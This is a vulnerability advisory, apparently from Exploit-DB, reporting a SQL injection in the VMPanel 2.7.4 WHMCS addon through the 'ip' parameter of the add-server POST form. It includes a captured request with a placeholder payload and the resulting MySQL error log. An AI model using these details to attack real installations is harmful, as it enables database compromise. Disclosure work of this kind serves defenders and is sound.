WHMCompleteSolution (WHMCS) Addon VMPanel 2.7.4 - SQL Injection

EDB-ID:

40932

CVE:

N/A


Author:

ZwX

Type:

webapps


Platform:

PHP

Date:

2016-12-16


=====================================================
[#] Exploit Title :  VMPanel 2.7.4 - SQL Injection Web Vulnerability
[#] Author : Esmaeil Rahimian
[#] Date Discovered : 2016-12-07
[#] Affected Product(s): VMPanel v2.7.4 - Content Management System
[#] Exploitation Technique: Remote
[#] Severity Level: Medium
[#] Tested OS : Windows 10
=====================================================


[#] Product & Service Introduction:
===================================
VMPanel is a powerful web based VMware Esx/Esxi Control Panel + WHMCS addon
with VMPanel you can create or remove virtual machines remotely without the need to access vsphere Client aslo you can
Power Off,Power On, reset,virtual machine through the panel and module for WHMCS

(Copy of the Vendor Homepage: http://www.cybervm.com/ )


[#] Technical Details & Description:
====================================
A remote sql injection web vulnerability has been discovered in the official VMPanel v2.7.4 web-application (cms).
The web vulnerability allows remote attackers to execute own malicious sql commands to compromise the web-application or dbms.

The sql-injection web vulnerability is located in the `IP Address` entry name, that is located in the pannel administration. 
Remote attackers are able to run clean sql commands, the vulnerability attack vector is application-side and 
the injection request method is POST.

Request Method(s):
              [+] POST

Vulnerable Module(s):
              [+] (Input)

Vulnerable Parameter(s):
              [+] IP Address


[#] Proof of Concept (PoC):
===========================
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


--- PoC Session Logs [POST]---
Status: 200 [OK]
Host: localhost:2023
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:2023/sesswuzs6ugfaxa7ufii/index.php?act=addserver
Cookie: head_ippool=2; head_storage=2; head_servers=2; ssupp.vid=UMvYqzxZJxPU8VfwJ23WTpt5PWxnqZmYHQ45341807122016; ssupp.geoloc=%7B%22ipAddress%22%3A%22176.156.184.208%22%2C%22countryCode%22%3A%22FR%22%2C%22country%22%3A%22France%22%2C%22region%22%3Anull%2C%22city%22%3Anull%7D; WHMCS4tXQk3bQ4YHY=l8580de1p2dm64gtevt7jj15s7; SIMCookies001_sid=yd0da41j3abie5zhb8jwjsd5nk6c07ce
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 141


POST Method: server_name=&ip=[INJECTION SQL HERE]&pass=&mikip=&mikuser=&mikpass=&bw=&addserver=Add+Server


--- PoC Error Logs ---
SELECT * FROM `servers` WHERE `server_ip` = ''"/>>:22'
MySQL Error No : 1064
MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"/>>:22'' at line 1


[#] Disclaimer:
===============
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.


Domain:     www.zwx.fr
Contact:    msk4@live.fr  
Social:     twitter.com/XSSed.fr
Feeds:      www.zwx.fr/feed/
Advisory:   www.vulnerability-lab.com/show.php?user=ZwX
            packetstormsecurity.com/files/author/12026/
            cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/
            0day.today/author/27461


                             Copyright (c) 2016 | ZwX - Security Researcher (Software & web application)